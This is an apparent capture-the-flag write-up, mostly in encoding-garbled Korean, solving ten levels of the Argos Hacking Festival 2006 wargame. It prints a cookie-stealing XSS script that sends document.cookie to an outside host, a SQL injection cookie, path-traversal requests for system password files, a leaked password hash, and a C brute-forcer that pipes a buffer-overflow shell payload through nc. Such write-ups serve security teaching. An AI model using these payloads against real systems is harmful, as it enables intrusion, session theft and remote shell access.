-----------------------------------
Argos Hacking Festival 0x7d6 rEpOrT
-----------------------------------

# whoami
iD        |  hkpco( madog )
nAmE      |  Park Chan-Am
mAiL&MsN  |  hkpco@korea.com
hOmEpAgE  |  http://hkpco.kr/


/ contents /
=============================================
level1 ~ level8
	one page, many hole

level9
	reverse engineering

level10
	web server vulnerability
	fedora core 3 remote bufferoverflow
=============================================



level!

Notice °Ô½ÃÆÇ¿¡ `Really Simple Syndication`À̶ó´Â °Ô½Ã±ÛÀÌ Çϳª ÀÖ½À´Ï´Ù.
ÀÌ´Â rssÀÇ ¾àÀÚ·Î °Ô½Ã±Û ³»¿ëÀÌ WhereÀΰͰú Á¾ÇÕÇؼ­ rss¶ó´Â µð·ºÅ丮¸¦ À¯Ãß ÇÒ ¼ö ÀÖ½À´Ï´Ù.
¾Æ·¡ÀÇ ÁÖ¼Ò·Î µé¾î°¡¸é µð·ºÅ丮 ¸®½ºÆÃÀÌ µÇ¸ç ahf2006.xmlÀ̶ó´Â ÆÄÀÏÀ» Çϳª º¼ ¼ö ÀÖ½À´Ï´Ù.

http://168.188.130.242/ahf2006/rss/

ÆÄÀÏÀ» Ŭ¸¯ÇÏ¿© µé¾î°¡¼­ Hint¸¦ º¸¸é defcon¿¡¼­ ¹ßÇ¥ÇÑ web2.0¿¡¼­ÀÇ Feed Injection¹®¼­°¡ ¸µÅ© µÇ¾î ÀÖ½À´Ï´Ù.
´ëºÎºÐ ÀÌ ¹®¼­ÀÇ ¹æ¹ýÀ» ÀÌ¿ëÇÏ¿© °ø°ÝÇÑ´Ù°í »ý°¢ ÇÒ ¼ö Àִµ¥ ÀÌ´Â ¼ÓÀÓ¼öÀÔ´Ï´Ù.
¼Ò½ºº¸±â¸¦ ÇÏ¸é ´ÙÀ½°ú °°ÀÌ Æ¯Á¤ÇÑ ÁÖ¼Ò¸¦ Æ÷ÇÔÇÑ iframeÅױ׸¦ »ç¿ëÇÏ°í Àִ°ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.

<iframe src=./rss_password width=0 height=0>

http://168.188.130.242/ahf2006/main/rss_password ÁÖ¼Ò·Î Á¢¼ÓÇϸé Ä£ÀýÇÏ°Ô Æнº¿öµå¸¦ ¾Ë·ÁÁÝ´Ï´Ù.

ÃàÇÏÇÕ´Ï´Ù! level1 Á¤´äÀÔ´Ï´Ù!
Æнº¿öµå´Â 'RssAtomFeedInjection' ÀÔ´Ï´Ù.





level@

Community °Ô½ÃÆÇÀÇ xss¹®Á¦ÀÔ´Ï´Ù.
ÇÏÁö¸¸ ¹«ÀÛÁ¤ xss¸¦ ÇÏ¸é ¾ÈµÇ°í °ü¸®ÀÚ°¡ ÀÐÀ»¸¸ÇÑ ²ø¸®´Â Á¦¸ñÀ¸·Î ±ÛÀ» ÀÛ¼ºÇÏ¿©¾ß ÇÕ´Ï´Ù.
±ÛÀÇ ³»¿ëÀº ÀϹÝÀûÀÎ xssÄÚµå·Î ´ÙÀ½°ú °°½À´Ï´Ù.

<script>document.location="http://hkpco.joinc.co.kr/query.php?query=" + document.cookie</script>

Á¶±Ý ±â´Ù·È´Ù°¡ ÀúÀåµÈ ÄíÅ°¸¦ È®ÀÎÇϸé

NAME=GUEST; PHPSESSID=348bdcc25a0358cbfa3c09df7121d0b7; level2_password=Social_is_the_best_hacking

Æнº¿öµå´Â Social_is_the_best_hacking





level#

¼Ò½ºº¸±â¸¦ Çϸé default.css¶ó´Â ÆÄÀÏÀÌ »ç¿ëµÇ¾î Áý´Ï´Ù.
»ìÆ캸¸é, ´ÙÀ½°ú °°Àº urlÀÌ importµÇ¾î ÀÖ½À´Ï´Ù.

@import url("./ahf2006.css");

À̸¦ 80¹ø Æ÷Æ®·Î ¿äûÇغ¸¸é ¾Æ·¡¿Í °°½À´Ï´Ù.

[hkpco@ns ahf]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET http://168.188.130.242/ahf2006/css/ahf2006.css HTTP/1.0

HTTP/1.1 200 OK
Date: Thu, 15 Feb 2007 14:47:02 GMT
Server: Apache/1.3.36 (Unix) PHP/4.4.2
Last-Modified: Tue, 13 Feb 2007 21:11:24 GMT
ETag: "8202c3-2f-45d2297c"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/css

<img src="./secret.php" width="0" height ="0">
Connection closed by foreign host.

secret.php¶ó´Â ÆäÀÌÁö·Î Á¢¼ÓÇϸé,

http://168.188.130.242/ahf2006/css/secret.php
ÃàÇϵ帳´Ï´Ù! ´«½ä¹Ì°¡ Àå³­ÀÌ ¾Æ´Ï½Ã±º¿ä :)
level3 Æнº¿öµå´Â 'css_import_faked' ÀÔ´Ï´Ù.





level$

¼Ò½ºº¸±â¸¦ Àß Çϸé <embed src=http://168.188.130.242/~admin/head_00.swf"> ¶ó´Â ű׸¦ º¼ ¼ö ÀÖ½À´Ï´Ù.
adminÀ̶ó´Â °èÁ¤¿¡ Ç÷¡½¬ÆÄÀÏÀ» ¿Ã·Á³õ°í »ç¿ëÇϴ°ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

¿©±â¼­ ¿©·¯ À¯Ã߸¦ ÅëÇÏ¿© http://168.188.130.242/~admin/admin/ ¶ó´Â ÀÎÁõ ÆäÀÌÁö¸¦ ã¾Ò°í,
adminÀ̶ó´Â ¾ÆÀ̵𸦠ã¾Æ³»°í bruteforceÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© µ¹·Áº¸¾ÒÁö¸¸ È¿°ú°¡ ¾ø¾ú½À´Ï´Ù.
Áö±Ý»ý°¢Çغ¸´Ï Æнº¿öµå´Â °£´ÜÇߴµ¥ ¾Æ¸¶µµ »çÀüÆÄÀÏÀÌ ¾ÈÁÁ¾Æ¼­ ±×·±°Í °°½À´Ï´Ù.

adminÀ̶ó´Â °èÁ¤ÀÇ .bash_historyÆÄÀÏ¿¡ ÀÛ¾÷±â·ÏÀÌ ¼û°ÜÁ® ÀÖÀ» °ÍÀÔ´Ï´Ù.
http://168.188.130.242/~admin/.bash_history

À¥ÀÎÁõ ¼³Á¤ ÀÛ¾÷±â·ÏÀÌ º¸ÀÔ´Ï´Ù.
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart

http://168.188.130.242/~admin/auth À¸·Î Á¢¼ÓÇÏ¿© º¸¸é,

admin:8G.C0m9ZnM8JQ
// admin password is admin123 :)

adminÀÇ Æнº¿öµå´Â admin123À̶ó´Â °ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

ȹµæÇÑ id/pw¸¦ ÀÌ¿ëÇÏ¿© Á¢¼ÓÇÏ¿© º¸¸é

¾Æ¸£°í½º »õ ȸÀå x15kangx ±ºÀº ¹è½½±â¸¦ »ç¶ûÇÑ´Ù. 
ÃàÇÏÇÕ´Ï´Ù! level4 Æнº¿öµå´Â 'qhrrheostm_qotmfrl' ÀÔ´Ï´Ù.





level%

introduceÆäÀÌÁö¿¡ ¾Æ¸£°í½º ¼Ò°³°¡ ³ª¿É´Ï´Ù.
±Û Áß°£Áß°£¿¡ <b>¸¦ ÀÌ¿ëÇÏ¿© ¸î¸î ¾ËÆĺªÀ» ÁøÇÏ°Ô Ç¥½Ã ÇÑ °ÍÀÌ ÀÖ½À´Ï´Ù.
¼Ò½ºº¸±â¸¦ ÇÏ¸é ¸î¸î ¹®ÀÚ¸¦ ´õ ãÀ» ¼ö Àִµ¥ À̸¦ Á¶ÇÕÇغ¸¸é googleÀÌ ³ª¿É´Ï´Ù.
badboys¶ó´Â °Ô½ÃÆÇÀ» ãÀ¸¶ó°í ÇÏ¿´°í googleÀ̶ó´Â ´Ü¾î¸¦ ÃßÃâ ÇÏ¿´À¸´Ï ±¸±Û°Ë»öÀ» »ý°¢ ÇÒ ¼ö ÀÖ½À´Ï´Ù.
¾Æ·¡¿Í °°ÀÌ ±¸±Û·Î °Ë»öÇϸé

badboys site:argos.or.kr
http://argos.or.kr/bbs/zboard.php?id=badboys ¶ó´Â ÁÖ¼Ò¸¦ ¾òÀ» ¼ö ÀÖ½À´Ï´Ù.

AHF¿¡ °ü·ÃµÈ °Ô½Ã±ÛÀ» Àо¸é,

±¸±ÛÀ» Ÿ°í ¸Õ ¹Ù´Ù¸¦ °Ç³Ê¿À½Ã´À¶ó ¼ö°í ¸¹À¸¼Ì½À´Ï´Ù.

Áö±Ý ¿äûÇϽŠÁ¦·Îº¸µå °Ô½ÃÆÇÀº ¾Æ¸£°í½º¿¡¼­ ¿ÜºÎ·Î´Â ¸µÅ©¸¦ °ø°³¾ÈÇÏ°í,
³»ºÎ¿¡¼­¸¸ »ç¿ëÇß´ø "¹èµåº¸ÀÌÁî" °Ô½ÃÆÇÀÔ´Ï´Ù.

ÀÚ! ¿øÇϽô°ÍÀ» µå¸®°Ú½À´Ï´Ù.

level5 Æнº¿öµå´Â 'GoogleDork@badboys' ÀÔ´Ï´Ù. 

ÃàÇÏÇÕ´Ï´Ù.





level^

index.php¿¡ ½É¾îÁ® ÀÖ´Â flash action script¸¦ º¸±â À§ÇÏ¿© 80¹øÆ÷Æ®·Î ¿äûÇÏ¸é ´äÀ» ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù.

[hkpco@ns hkpco]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET /index.php HTTP/1.0

<font color=#ffffff><small>ÃàÇÏÇÕ´Ï´Ù! level6 Á¤´äÀÔ´Ï´Ù!</small></font>
<br><font color=#ffffff><small>Æнº¿öµå´Â HackTheFlashActionScript ÀÔ´Ï´Ù.</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>
Connection closed by foreign host.





level&

gifÆÄÀÏÀÇ Steganography¹®Á¦ÀÔ´Ï´Ù.
½ºÅ×°¡³ë¹®Á¦ÀÇ Æнº¿öµå´Â ÇØ´ç ÆäÀÌÁö¿¡¼­ ¼Ò½ºº¸±â¸¦ ÅëÇØ Á÷Á¢ÀûÀ¸·Î ¾Ë ¼ö ÀÖ½À´Ï´Ù.( passwd: fbthdms )
introductionÆäÀÌÁö¿¡ ÀÖ´Â badboys.gif¿¡ ´ëÇØ HIP(Hide In Picture)À̶ó´Â ÇÁ·Î±×·¥À» »ç¿ëÇÑ °á°ú´Â ¾Æ·¡¿Í °°½À´Ï´Ù.

\x30\x31\x30
\x20\x2D\x20
\x36\x34\x37\x39
\x20\x2D\x20
\x36\x39\x38\x38
\x20
\x63\x61\x6c\x6c
\x20
\x6d\x65

À̸¦ ¹®ÀÚ·Î ³ªÅ¸³»¾î º¸¸é

[hkpco@ns ahf]$ hk \x30\x31\x30\x20\x2D\x20\x36\x34\x37\x39\x20\x2D\x20\x36\x39\x38\x38\x20\x63\x61\x6c\x6c\x20\x6d\x65 \x
010 - **** - 6988 call me

À§ÀÇ ÀüÈ­¹øÈ£·Î ºñ¹Ð¹øÈ£¸¦ ¹°¾îº¸¸é ¾î¶² ¿©ÀÚºÐÀÌ "Àúµµ¸ô¶ó¿ä" ¶ó°í ´äÇØÁֽʴϴÙ.
Á¤´äÀº, wjehahffkdy(Àúµµ¸ô¶ó¿ä)





levcel*

ADMINPAGE¿¡ Á¢¼ÓÀ» ÇÏ¸é ±ÇÇÑÀÌ ¾ø´Ù°í ¶å´Ï´Ù.
ÇöÀç ÄíÅ°°ªÀ» º¸¸é NAME=GUEST¶ó°í µÇ¾îÀÖ½À´Ï´Ù.
NAME=ADMINÀ¸·Î ¼öÁ¤ÇÑ µÚ µé¾î°¡¸é `°ü¸®ÀÚ´Â Âü±ú¸¦ ÁÁ¾ÆÇØ`¶ó´Â ¹®±¸°¡ ÀÖ°í `Âü`À̶ó´Â ¹®ÀÚ°¡ »¡°£»öÀ¸·Î °­Á¶µÇ¾î ÀÖ½À´Ï´Ù.
ÄíÅ° º¯¼ö»óÀÇ sql injectionÀ» À¯Ãß ÇÒ ¼ö Àִµ¥, ´ÙÀ½°ú °°ÀÌ ÄíÅ°¸¦ ¹Ù²Ù¾î Á¢¼ÓÇØ º¾´Ï´Ù.

NAME='or 1=1#

°£´ÜÈ÷ ÀÎÁõÀÌ ¿ìȸ°¡ µÇ°í Àú¸¦ À¯È¤ÇÏ´Â ¿©ÀÚÀÇ »çÁø°ú ¾ÆÁÖ ¸ÅÄ¡°¡ µÇÁö ¾Ê´Â ±â°èÀ½ÀÌ Á¤´äÀ» ¸»ÇØÁÝ´Ï´Ù.
¼ÖÁ÷È÷ Àß ¾Ë¾ÆµéÀ» ¼ö ¾ø¾ú½À´Ï´Ù. Á÷Á¢ ³ìÀ½ÇßÀ¸¸é ´õ ÁÁ¾ÒÀ»¹ý Çß½À´Ï´Ù.
Á¤´äÀº manlikessexygirl





level(

AHF2006.exe¶ó´Â À©µµ¿ì ÆÄÀÏÀÌ Çϳª ÁÖ¾îÁý´Ï´Ù.
½ÇÇà½ÃÄѺ¸¸é 2006°³ÀÇ ¼ýÀÚ¸¦ MessageBox¸¦ ÀÌ¿ëÇÏ¿© º¸¿©ÁÝ´Ï´Ù.
´Ù ´õÇÏ¸é ´äÀ̶ó°í Çϴµ¥ À̸¦ ´Ù °è»êÇÏ·Á¸é 2006¹ø ¿£Å͸¦ ÃÄ ÁÖ¾î¾ß ÇÕ´Ï´Ù.
ÇÏÁö¸¸ ¿ì¸®¿¡°Õ ¾ÆÁÖ ÁÁÀº µð¹ö±ë ÅøÀÌ ¸¹½À´Ï´Ù.
ollydbg·Î ÆÄÀÏÀ» ¿­¾î¼­ °£´ÜÈ÷ »ìÆ캸°Ú½À´Ï´Ù.

004014F4   . C74424 20 2100>MOV DWORD PTR SS:[ESP+20],21
004014FC   . 894424 24      MOV DWORD PTR SS:[ESP+24],EAX
00401500   . C74424 28 3B00>MOV DWORD PTR SS:[ESP+28],3B
00401508   . 897C24 2C      MOV DWORD PTR SS:[ESP+2C],EDI
0040150C   . C74424 30 4D00>MOV DWORD PTR SS:[ESP+30],4D
00401514   . C74424 34 5000>MOV DWORD PTR SS:[ESP+34],50
.
.
.
00406663   . C78424 441F000>MOV DWORD PTR SS:[ESP+1F44],41
0040666E   . C78424 4C1F000>MOV DWORD PTR SS:[ESP+1F4C],14
00406679   . 898C24 501F000>MOV DWORD PTR SS:[ESP+1F50],ECX
00406680   . 899C24 541F000>MOV DWORD PTR SS:[ESP+1F54],EBX
00406687   . C78424 581F000>MOV DWORD PTR SS:[ESP+1F58],45

ESP+20 ~ ESP+1F44 , 4¹ÙÀÌÆ® °ø°£ÀÇ °¢°¢ÀÇ º¯¼ö¿¡ 2006°³ÀÇ ¼ýÀÚ¸¦ ÇÒ´çÇÕ´Ï´Ù.


¾Æ·¡ÀÇ Äڵ尡 °¡Àå Áß¿äÇÕ´Ï´Ù.

004066EA   . 33FF           XOR EDI,EDI
004066F4   . 33C0           XOR EAX,EAX                              ;  AHF2006.00430414
004066F6   . 8D7424 20      LEA ESI,DWORD PTR SS:[ESP+20]
004066FA   > 8B2E           MOV EBP,DWORD PTR DS:[ESI]
004066FC   . 03FD           ADD EDI,EBP
004066FE   . 40             INC EAX
004066FF   . 894424 1C      MOV DWORD PTR SS:[ESP+1C],EAX
.
.
.
00406750     E8 B67A0100    CALL AHF2006.0041E20B
00406755   . 8B4424 1C      MOV EAX,DWORD PTR SS:[ESP+1C]
00406759   . 83C6 04        ADD ESI,4
0040675C   . 3D D6070000    CMP EAX,7D6
00406761    ^7C 97          JL SHORT AHF2006.004066FA

eax¸¦ 0À¸·Î ÃʱâÈ­ ÇѵÚ, 2006°³ÀÇ ¼öÁß Ã¹¹ø° °ª(ESP+20)À» ESI¿¡ ³Ö°í ó¸® ÇÏ°í
004066FA ~ 00406761 »çÀÌ¿¡¼­ ·çÇÁ¹®ÀÌ µ½´Ï´Ù.

ESP+20ÀÇ ÁÖ¼Ò°ªÀ» ESI¿¡ ÇÒ´çÇÏ°í ESIÀÇ °ªÀ» EBP¿¡ À̵¿ÇÕ´Ï´Ù.
±×¸®°í ÃʱâÈ­µÈ EDI¿¡ EBP°ªÀ» ´õÇÑµÚ ÇöÀç °ªÀÌ 0ÀÎ EAX¸¦ 1 Áõ°¡½Ãŵ´Ï´Ù.
EAX·¹Áö½ºÅÍ´Â ´Ù¸¥ ¼öÇàºÎºÐ¿¡ ½á¾ßÇϹǷΠESP+1C¿¡ ÀúÀåÇÏ¿© µÓ´Ï´Ù.

CALL AHF2006.0041E20B´Â MessageBoxÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© n¹ø° ¼ýÀÚ¸¦ º¸¿©ÁÖ´Â ºÎºÐÀÔ´Ï´Ù.
±×¸®°í ¾Æ±î ÀúÀåµÇ¾ú´ø ESP+1C(EAX)¸¦ ´Ù½Ã EAX·Î À̵¿½ÃŲ µÚ, ESI°ª¿¡ +4¸¦ ÇÕ´Ï´Ù.
EAX°ªÀ» 0x7d6(10Áø¼ö 2006)°ú ºñ±³ ÇÑ µÚ EAX°ªÀÌ ÀÛÀ¸¸é 004066FA·Î Á¡ÇÁÇÕ´Ï´Ù.
ESI¿¡ +4¸¦ ÇÏ´Â ÀÌÀ¯´Â intÇü ¹è¿­¿¡ 2006°³ÀÇ ¼ýÀÚ¸¦ ÇÒ´çÇÏ¿´´Âµ¥ ÀÌ °£°ÝÀº °¢°¢ 4¹ÙÀÌÆ® À̱⠶§¹®ÀÔ´Ï´Ù.

À§ÀÇ ·çƾÀ» º¸¸é °á±¹Àº EDI·¹Áö½ºÅÍ¿¡ 2006°³ÀÇ ¼ýÀÚ¸¦ ´Ù ´õÇÑ °ªÀÌ µé¾îÀÖ´Ù´Â °ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.
ÇÏÁö¸¸ MessageBoxÇÔ¼ö ¶§¹®¿¡ 2006¹ø ¿£Å͸¦ ÃÄ¾ß ÇÕ´Ï´Ù.
ÀÌ ¾öû³­ ¹ø°Å·Î¿òÀ» ¾ø¾Ö±â À§ÇÏ¿© MessageBox¸¦ È£ÃâÇÏ´Â call¹®À» µû¶ó °©´Ï´Ù.

0041E20B ÁÖ¼Ò·Î À̵¿ÇÏ°Ô µÇ¸é Á¶±Ý ¾Æ·§ºÎºÐ¿¡ MessageBoxÇÔ¼ö¸¦ ½ÇÇà ½ÃÅ°±â À§ÇÑ ºÎºÐÀÌ ÀÖ½À´Ï´Ù.

0041E229     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; /Style
0041E22D     50                   PUSH EAX                                               ; |Title
0041E22E     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; |Text
0041E232     51                   PUSH ECX                                               ; |hOwner
0041E233     FF15 08744200        CALL DWORD PTR DS:[<&USER32.MessageBoxA>]              ; \MessageBoxA

À̸¦ ¸ðµÎ NOPÀ¸·Î ä¿öÁÖ°í ·çÇÁ¹®ÀÌ ³¡³ª´Â

00406763   . 8D4C24 14            LEA ECX,DWORD PTR SS:[ESP+14]

ºÎºÐ¿¡ breakpoint¸¦ °É¾îÁØ µÚ ÇÁ·Î±×·¥À» ½ÇÇà ½ÃÅ°°Ô µÇ¸é EDI·¹Áö½ºÅÍ¿¡ 00018426 ¶ó´Â ÃÖÁ¾ÀûÀÎ °ªÀÌ ÀúÀåµË´Ï´Ù.

À̸¦ 10Áø¼ö·Î ³ªÅ¸³»¸é 99366
±×·¯¹Ç·Î Á¤´äÀº 99366





level)

8080Æ÷Æ®ÀÇ À¥¼­¹ö¿¡ Ãë¾àÁ¡ÀÌ ÀÖ¾ú½À´Ï´Ù.

-> GET request_file

À§¿Í °°Àº Çü½ÄÀ¸·Î ¿äûÀÌ µÇ¸ç ÆÄÀϾտ¡ ÀÚµ¿À¸·Î . ¹®ÀÚ°¡ Ãß°¡µÇ¾ú½À´Ï´Ù.

ÆÄÀÏ À̸§À» ÀÔ·ÂÇÏÁö ¾ÊÀ¸¸é ÀÚµ¿À¸·Î index.htmlÀ» ¿äûÇÏ°Ô µË´Ï´Ù.

../ ¸¦ ÅëÇÏ¿© »óÀ§ °æ·Î¿¡ ÀÖ´Â ÆÄÀϵµ ½±°Ô ¿­¶÷ ÇÒ ¼ö ÀÖ½À´Ï´Ù.

´ÙÀ½°ú °°ÀÌ /etc/passwd¸¦ ¿äûÇÕ´Ï´Ù.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../etc/shadow

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
x15kangx:x:500:500:Jun-Hee:/home/x15kangx:/bin/bash
choco1435:x:501:501::/home/choco1435:/bin/bash
mysql:x:502:502:Mysql_server:/usr/local/mysql:/bin/nologin
thanatos:x:503:503::/home/thanatos:/bin/bash
exso:x:504:504::/home/exso:/bin/bash
ssabro:x:505:505::/home/ssabro:/bin/bash
jerasordy:x:506:506::/home/jerasordy:/bin/bash
laidback_girl:x:507:507::/home/laidback_girl:/bin/bash
llplatinumll:x:508:508::/home/llplatinumll:/bin/bash


¿©·¯ °èÁ¤ÀÇ index.htmlÆÄÀÏÀ» »ìÆì º» °á°ú, º¸³Ê½º ¹®Á¦ÀÇ Á¤´ä°ú level10¹®Á¦¸¦ Ç®ÀÌÇϴµ¥ ÇÊ¿äÇÑ Á¤º¸µéÀ» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../home/x15kangx/public_html/index.html

<html>
<body>

{<text variable, no debug info>} 0xd2d780 <system>
ret: 8049a5a

ÃàÇÏÇÕ´Ï´Ù. ÀÌ ÆÄÀÏÀº º¸³Ê½º ¹®Á¦ ÆÄÀÏÀÔ´Ï´Ù.^^
ãÀ¸¼Ì³×¿ä?^^

post¹æ½ÄÀ¸·Î 'level'Ç׸ñÀ» bonus·Î ¹Ù²Ù°í ÀÎÁõÇϼ¼¿ä.

http://168.188.130.243/ahf2006/main/level_auth_action.php


BonusPasswd: Yap!!

</body>
</html>

º¸³Ê½º ¹®Á¦¸¦ ÀÎÁõ ÇÑ µÚ, ¿©±â¼­ ¾òÀº retcodeÁÖ¼Ò¿Í systemÁÖ¼Ò¸¦ ÀÌ¿ëÇÏ¿© À¥¼­¹öÀÇ Ãë¾àÁ¡À» °ø·«ÇÏ¿©¾ß ÇÕ´Ï´Ù.
À¥¼­¹ö¿¡ ÀÖ´Â Ãë¾àÁ¡Àº GETÀ¸·Î ÆÄÀÏÀ» ¿äû¹ÞÀ»¶§ ÀϾ´Â BufferOverFlow ÀÔ´Ï´Ù.
fedora core3¿¡¼­ÀÇ remote bof ¼³¸íÀº »ý·«ÇÏ°Ú½À´Ï´Ù.

¸î°¡Áö Á¶»ç¸¦ Çغ» °á°ú ¼­¹ö´Â Fedora core 3 À̾ú°í, ¼­¹ö°¡ °­Á¦ Á¾·á µÇ´Â ÁöÁ¡( ~sfp )À» ±¸Çß½À´Ï´Ù.
retcodeÀÇ ÁÖ¼Ò¸¦ Áõ°¡½ÃÅ°¸ç systemÇÔ¼öÀÇ ÀÎÀÚ°¡ ebp¿¡ ÀÖ´Â sh¸í·É¾î¿Í ¹°¸®µµ·Ï ´ÙÀ½°ú °°ÀÌ °£´ÜÇÑ bruteforce¸¦ ½ÃµµÇÕ´Ï´Ù.

[hkpco@ns ahf]$ cat brute.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
	int c=0,i=0,d;
	char cmd[1024]={0x00,};

	for( ; c<31 ; c++ , i++ )
	{
		printf( "%d\n" , i );
		sprintf( cmd , "(perl -e \'print \"GET \", \"a\"x381, \";sh\",
				 \"\\x5a\\x9a\\x04\\x08\"x%d,
				 \"\\x80\\xd7\\xd2\\x00\",
				 \"\\r\\n\\r\\n\"\';cat) | nc 168.188.130.249 8080" , c );
		printf( "%s\n" , cmd );
		system( cmd );
        }
        printf( "bye.\n" );
}

[hkpco@ns ahf]$ ./brute
0
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x0,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

1
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x1,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

2
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x2,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

3
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x3,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

.
.
.

27
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x27,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

28
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x28,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

29
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x29,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

30
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x30,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

bye.
[hkpco@ns ahf]$

°ø°ÝÀÌ µÇÁú ¾Ê¾Æ È®ÀÎÇÏ¿© º¸´Ï ¼­¹ö°¡ Á×¾îÀÖ¾ú°í ´ëȸ°¡ ³¡³µ½À´Ï´Ù.